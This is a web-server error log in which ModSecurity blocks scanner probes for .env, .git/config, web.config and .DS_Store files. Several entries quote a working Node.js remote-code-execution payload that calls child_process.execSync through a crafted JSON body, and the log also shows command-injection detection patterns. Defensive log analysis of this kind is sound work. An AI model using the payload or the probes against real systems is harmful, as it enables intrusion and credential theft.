"economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aVYvvv8XCgNe-1KotIuG3gAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.906311 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aVYvvv8XCgNe-1KotIuG3gAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.906554 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aVYvvv8XCgNe-1KotIuG3gAAAAI"], referer: https://www.google.com/
[Thu Jan 01 09:26:38.906723 2026] [:error] [pid 1117410] [client 54.75.202.236:53998] [client 54.75.202.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aVYvvv8XCgNe-1KotIuG3gAAAAI"], referer: https://www.google.com/
[Thu Jan 01 14:36:39.413948 2026] [:error] [pid 1117410] [client 85.11.167.4:33518] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1767274599_4712',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z_8XCgNe-1KotIuG-AAAAAI"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.414084 2026] [:error] [pid 1117410] [client 85.11.167.4:33518] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1767274599_4712',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z_8XCgNe-1KotIuG-AAAAAI"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.414200 2026] [:error] [pid 1117410] [client 85.11.167.4:33518] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1767274599_4712 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z_8XCgNe-1KotIuG-AAAAAI"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.415444 2026] [:error] [pid 1117410] [client 85.11.167.4:33518] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z_8XCgNe-1KotIuG-AAAAAI"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.415605 2026] [:error] [pid 1117410] [client 85.11.167.4:33518] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z_8XCgNe-1KotIuG-AAAAAI"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.565225 2026] [:error] [pid 1122286] [client 85.11.167.4:33524] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1767274599',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z9_f6bTRaSZFyl1UqwAAAAk"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.565340 2026] [:error] [pid 1122286] [client 85.11.167.4:33524] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1767274599',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z9_f6bTRaSZFyl1UqwAAAAk"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.565423 2026] [:error] [pid 1122286] [client 85.11.167.4:33524] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1767274599 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z9_f6bTRaSZFyl1UqwAAAAk"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.566488 2026] [:error] [pid 1122286] [client 85.11.167.4:33524] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z9_f6bTRaSZFyl1UqwAAAAk"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 14:36:39.566634 2026] [:error] [pid 1122286] [client 85.11.167.4:33524] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aVZ4Z9_f6bTRaSZFyl1UqwAAAAk"], referer: https://economiasolidale.test.indacotrentino.com
[Thu Jan 01 21:39:37.365332 2026] [authz_core:error] [pid 1117409] [client 206.81.24.227:50654] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Jan 01 21:39:40.461013 2026] [:error] [pid 1117460] [client 206.81.24.227:52488] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aVbbjCEFf7TT1LdjoKPHYQAAAAc"]
[Thu Jan 01 21:39:40.461251 2026] [:error] [pid 1117460] [client 206.81.24.227:52488] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aVbbjCEFf7TT1LdjoKPHYQAAAAc"]
[Thu Jan 01 21:39:40.461400 2026] [:error] [pid 1117460] [client 206.81.24.227:52488] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aVbbjCEFf7TT1LdjoKPHYQAAAAc"]
[Thu Jan 01 21:39:41.400978 2026] [:error] [pid 1122285] [client 206.81.24.227:52502] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVbbjV3H7dX9yBPXgd6V2gAAAAg"]
[Thu Jan 01 21:39:41.401215 2026] [:error] [pid 1122285] [client 206.81.24.227:52502] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVbbjV3H7dX9yBPXgd6V2gAAAAg"]
[Thu Jan 01 21:39:41.401378 2026] [:error] [pid 1122285] [client 206.81.24.227:52502] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aVbbjV3H7dX9yBPXgd6V2gAAAAg"]
[Thu Jan 01 21:39:43.403791 2026] [:error] [pid 1117412] [client 206.81.24.227:52516] [client 206.81.24.227] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVbbj3NXDBI5CgrqjG_AMAAAAAQ"]
[Thu Jan 01 21:39:43.403993 2026] [:error] [pid 1117412] [client 206.81.24.227:52516] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVbbj3NXDBI5CgrqjG_AMAAAAAQ"]
[Thu Jan 01 21:39:43.404139 2026] [:error] [pid 1117412] [client 206.81.24.227:52516] [client 206.81.24.227] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVbbj3NXDBI5CgrqjG_AMAAAAAQ"]
[Thu Jan 01 21:39:47.073727 2026] [authz_core:error] [pid 1117410] [client 139.59.136.184:54502] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Jan 01 21:39:50.124328 2026] [:error] [pid 1117408] [client 139.59.136.184:56954] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVbblsxklYLeA04vs51G_wAAAAA"]
[Thu Jan 01 21:39:50.124586 2026] [:error] [pid 1117408] [client 139.59.136.184:56954] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVbblsxklYLeA04vs51G_wAAAAA"]
[Thu Jan 01 21:39:50.124748 2026] [:error] [pid 1117408] [client 139.59.136.184:56954] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aVbblsxklYLeA04vs51G_wAAAAA"]
[Thu Jan 01 21:39:51.073728 2026] [:error] [pid 1117460] [client 139.59.136.184:56966] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVbblyEFf7TT1LdjoKPHZAAAAAc"]
[Thu Jan 01 21:39:51.073961 2026] [:error] [pid 1117460] [client 139.59.136.184:56966] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVbblyEFf7TT1LdjoKPHZAAAAAc"]
[Thu Jan 01 21:39:51.074124 2026] [:error] [pid 1117460] [client 139.59.136.184:56966] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aVbblyEFf7TT1LdjoKPHZAAAAAc"]
[Thu Jan 01 21:39:53.139787 2026] [:error] [pid 1122285] [client 139.59.136.184:56978] [client 139.59.136.184] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVbbmV3H7dX9yBPXgd6V3AAAAAg"]
[Thu Jan 01 21:39:53.140017 2026] [:error] [pid 1122285] [client 139.59.136.184:56978] [client 139.59.136.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVbbmV3H7dX9yBPXgd6V3AAAAAg"]
[Thu Jan 01 21:39:53.140701 2026] [:error] [pid 1122285] [client 139.59.136.184:56978] [client 139.59.136.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVbbmV3H7dX9yBPXgd6V3AAAAAg"]
